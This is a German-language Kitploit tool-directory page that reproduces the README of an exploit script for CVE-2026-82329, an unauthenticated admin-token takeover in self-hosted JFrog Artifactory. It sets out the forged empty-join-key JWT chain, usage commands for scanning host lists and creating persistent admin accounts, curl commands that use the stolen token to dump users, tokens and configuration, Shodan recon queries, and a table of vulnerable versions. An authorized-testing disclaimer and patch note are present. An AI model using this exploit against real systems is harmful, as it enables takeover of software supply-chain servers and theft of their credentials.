Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-82329-JFrog-Artifactory-Auth-Bypass — Exploit für CVE-2026-82329, eine nicht authentifizierte Authentifizierungsumgehung in selbst gehostetem JFrog Artifactory, die die Übernahme von Admin-Tokens über einen leeren Join-Key ermöglicht. | Kitploit
Tools/GitHubGitHub/ynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass
Authentifizierung & AutorisierungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstests
GitHubynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass

CVE-2026-82329-JFrog-Artifactory-Auth-Bypass

Exploit für CVE-2026-82329, eine nicht authentifizierte Authentifizierungsumgehung in selbst gehostetem JFrog Artifactory, die die Übernahme von Admin-Tokens über einen leeren Join-Key ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 8h 50mNoch nicht geprüft

artifactory.py

artifactory.py — CVE-2026-82329 unauth admin takeover

root@kitploit:~
╔══════════════════════════════════════════════════════════╗
║  artifactory  ·  CVE-2026-82329 unauth admin takeover    ║
║  mitsec       ·  https://x.com/ynsmroztas                ║
╚══════════════════════════════════════════════════════════╝

CVE-2026-82329 — JFrog Artifactory (selbst gehostet) unauthentifizierter Join-JWT
→ SERVICE admin-Token → Plattform-applied-permissions/admin-Zugriffstoken.

CVSS 9.8 · CWE-287 · CISA KEV · in freier Wildbahn ausgenutzt.

Nur für autorisierte Tests. Führen Sie dies nicht gegen Systeme aus, die Ihnen nicht gehören oder für die Sie keine schriftliche Genehmigung zum Testen haben.


Was es tut

Standardmäßige selbst gehostete Installationen vertrauen einem leeren Join-Key.

root@kitploit:~
JoinKeyUtils.getSigningKey("")  ==  pkcs7(empty, 32)  ==  32 × 0x20
kid = SHA256("") = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Cloud-gehostetes JFrog ist gepatcht. Nur selbst gehostet.

Access-Fix-Linie: 7.191.14.


Installation

root@kitploit:~
# nur stdlib — kein pip
python3 artifactory.py -h

TLS-Verifizierung ist standardmäßig deaktiviert (selbstsigniertes Artifactory ist normal).
Kein zusätzliches Flag.


Verwendung

root@kitploit:~
# einzelner Host
python3 artifactory.py -u https://artifactory.example.internal:8082

# gemünztes Admin-Token ausgeben
python3 artifactory.py -u https://TARGET:8082 --token

# Liste / Pipeline (httpx, shodan, subfinder-Stil)
python3 artifactory.py -l hosts.txt --threads 8
cat hosts.txt | python3 artifactory.py

# Nur Pro / Enterprise — lokalen Admin persistieren (destruktiv)
python3 artifactory.py -u https://TARGET:8082 --create-admin auditor:ChangeMe_1

Ausgabe

root@kitploit:~
[VULN]  https://TARGET:8082  join=201 svc_scp=admin admin token scp=applied-permissions/admin aud=* config=200/42020b tokens=200 version=7.161.19
[SAFE]  https://patched:8082  join HTTP 401  (gepatcht / kein leerer Key)
[FAIL]  https://dead:8082     nicht erreichbar
TagBedeutung

--token gibt den Bearer-Wert aus. Das ist die Übernahme — ein Login-Benutzer ist optional.

--create-admin liefert auf OSS oft 400 (PUT /artifactory/api/security/users ist Pro).
Das Admin-Token funktioniert trotzdem. Persistenz ist für einen gültigen Befund nicht erforderlich.


Nach einem Treffer — das Token verwenden

Ersetzen Sie TARGET und fügen Sie das Token aus --token ein.

root@kitploit:~
TOKEN='eyJ...'          # Ausgabe von --token
B='https://TARGET:8082'

# Version / Edition
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/version"

# Benutzerverzeichnis (Admin)
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v2/users"

# Jedes Zugriffstoken auf der Instanz
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens" | head -c 400

# Repository-Inventar
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/repositories"

Weitere nützliche Nur-Admin-Lesezugriffe (nicht schreiben, außer autorisiert):

root@kitploit:~
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/configuration" -o config.xml

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/security/users"

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens"

UI: Plattform → Anmelden mit Access Token, oder senden Sie
Authorization: Bearer <token> bei jeder Anfrage.

Optionaler persistenter Benutzer (Pro / Access v2)

root@kitploit:~
curl -sk -D- -X POST "$B/access/api/v2/users" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"auditor","email":"[email protected]","password":"ChangeMe_1Aa","admin":true}'

Passwortrichtlinie 400 ≠ nicht verwundbar. Token hat bereits aud=*.


Aufklärung

root@kitploit:~
# Shodan
http.component:"Artifactory" port:8081,8082
title:"Artifactory" "JFrog"
http.html:"/artifactory/webapp"
ssl.cert.subject.CN:"artifactory"

# gängige Ports
8081  8082  8040  8046  443

Das Tool entfernt /artifactory /ui /webapp aus -u und kommuniziert mit dem Access-Router auf derselben Origin.


Warum --create-admin nicht der Befund ist

Auswirkung melden als: unauthentifiziertes Plattform-Administrator-Token.
Benutzererstellung ist eine Folgeaktion, nicht das Kernproblem.


Referenzen

  • NVD — CVE-2026-82329
  • JFrog-Sicherheitshinweise
  • Self-managed Releases / Patches
  • Labor + Patch-Diff: dinosn/cve-2026-82329-jfrog-artifactory

Haftungsausschluss

Dieses Repository ist ein Validator für Systeme, die Sie testen dürfen.
Das Münzen von Tokens, das Auflisten von Benutzern oder das Erstellen von Konten auf Infrastruktur Dritter ohne Erlaubnis ist illegal.

Patch: Aktualisieren Sie auf den behobenen Build für Ihren Branch, setzen Sie einen echten Join-Key, rotieren Sie nach der Offenlegung gemünzte Tokens.


mitsec · @ynsmroztas

Tool herunterladen
SchrittAnfrageErgebnis
1HS256-Join-JWT fälschen (iat frisch, skip_node_registration=true)bekannter HMAC-Secret
2POST /access/api/v1/registry/join201 SERVICE-Token scp=admin
3POST /access/api/v1/tokens200 Admin-Token scp=applied-permissions/admin aud=*
4GET /artifactory/api/system/configurationNur-Admin-Nachweis (unauth = 401)
BranchVerwundbar ≤Behoben
7.1117.111.207.111.21
7.1177.117.277.117.28
7.1257.125.197.125.20
7.1337.133.287.133.29
7.1467.146.377.146.38
7.1617.161.197.161.20
VULNLeerer Join akzeptiert + Admin-Nachweis (configuration oder Token-Liste = 200)
SAFEJoin abgelehnt — gepatcht, zusätzliche Join-Keys gesetzt oder kein Access
INFOJoin gemünzt, Nachweis-Endpunkte nicht 200 — manuell prüfen
FAILNetzwerk / Timeout
OberflächeOSSPro / Enterprise
Admin-Zugriffstoken münzenjaja
Config lesen / Tokens auflisten / Reposjaja
PUT /artifactory/api/security/users400 nur Pro200/201
POST /access/api/v2/usersversions-/richtlinienabhängig201